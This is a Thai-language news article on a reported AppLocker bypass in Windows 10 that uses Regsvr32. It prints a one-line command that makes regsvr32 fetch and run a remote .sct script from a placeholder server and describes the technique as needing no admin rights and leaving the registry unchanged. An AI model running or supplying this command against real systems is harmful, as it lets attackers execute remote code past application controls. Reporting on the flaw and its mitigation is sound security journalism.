นักวิจัยจากโคโลราโดที่ชื่อ Casey Smith พบว่า Regsvr32 สามารถใช้เพื่อข้าม AppLocker ใน Windows 10 และนี่เป็นปัญหาใหญ่สำหรับผู้ใช้คอมพิวเตอร์โดยเฉพาะผู้ที่อยู่ในสภาพแวดล้อมทางธุรกิจ

AppLocker เปิดตัวครั้งแรกใน Windows 7 และ Windows Server 2008 R2 มันถูกออกแบบมาเพื่อให้ผู้ดูแลระบบสามารถระบุกลุ่มหรือผู้ใช้ที่สามารถใช้ประโยชน์จากแอพพลิเคชั่นบางส่วนหรือทั้งหมดตามลักษณะเฉพาะของไฟล์ หากคุณเป็นบุคคลที่มีแนวโน้มที่จะใช้ AppLocker มันควรเป็นความรู้ทั่วไปที่สามารถใช้ในการสร้างกฎบางอย่างเพื่ออนุญาตให้แอปพลิเคชันเรียกใช้หรือหยุดพวกเขาในแทร็กของพวกเขา

สำหรับผู้ที่อาจไม่รู้ตัว Regvr32 สามารถใช้เพื่อลงทะเบียนและยกเลิกการลงทะเบียน DLLs นี่ไม่ใช่เครื่องมือแบบคลิกเดียวที่เห็นเนื่องจากเป็นยูทิลิตีบรรทัดคำสั่งดังนั้นผู้ใช้คอมพิวเตอร์ขั้นสูงเท่านั้นควรพยายามใช้ประโยชน์จากสิ่งที่มีให้

เราเข้าใจว่าการใช้เทคนิคนี้จะไม่เปลี่ยนรีจิสทรีของระบบคอมพิวเตอร์ซึ่งทำให้ผู้ดูแลระบบทราบได้ยากว่ามีการเปลี่ยนแปลงใดบ้าง

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

“ สิ่งที่น่าทึ่งในที่นี้คือ regsvr32 ทราบถึงพรอกซีแล้วใช้ TLS ตามการเปลี่ยนเส้นทาง ฯลฯ …และ…คุณคาดเดาไบนารี MS เริ่มต้นที่ลงชื่อแล้ว ดังนั้นสิ่งที่คุณต้องทำคือโฮสต์ไฟล์ your.sct ที่ตำแหน่งที่คุณควบคุม” สมิ ธ เขียน

เทคนิคข้างต้นไม่จำเป็นต้องมีสิทธิ์ของผู้ดูแลระบบและจะไม่ทำการเปลี่ยนแปลงรีจิสทรี นอกจากนี้สคริปต์สามารถเรียกใช้ผ่านทั้ง HTTP หรือ HTTPS ในขณะนี้ Microsoft ยังไม่ได้ปล่อยโปรแกรมแก้ไขสำหรับปัญหาเล็ก ๆ นี้ดังนั้นตัวเลือกเดียวในจุดนี้คือการบล็อก Regsvr32 ผ่านไฟร์วอลล์ Windows

น่าสนใจพอยักษ์ซอฟต์แวร์ยังไม่ตอบสนองต่อปัญหาด้านความปลอดภัยที่เผชิญกับระบบปฏิบัติการ ตอนนี้มันเปิดออกแล้วเราคาดว่าจะได้ยินอะไรบางอย่างจาก บริษัท พร้อมกับพูดถึงการแก้ไขในอนาคต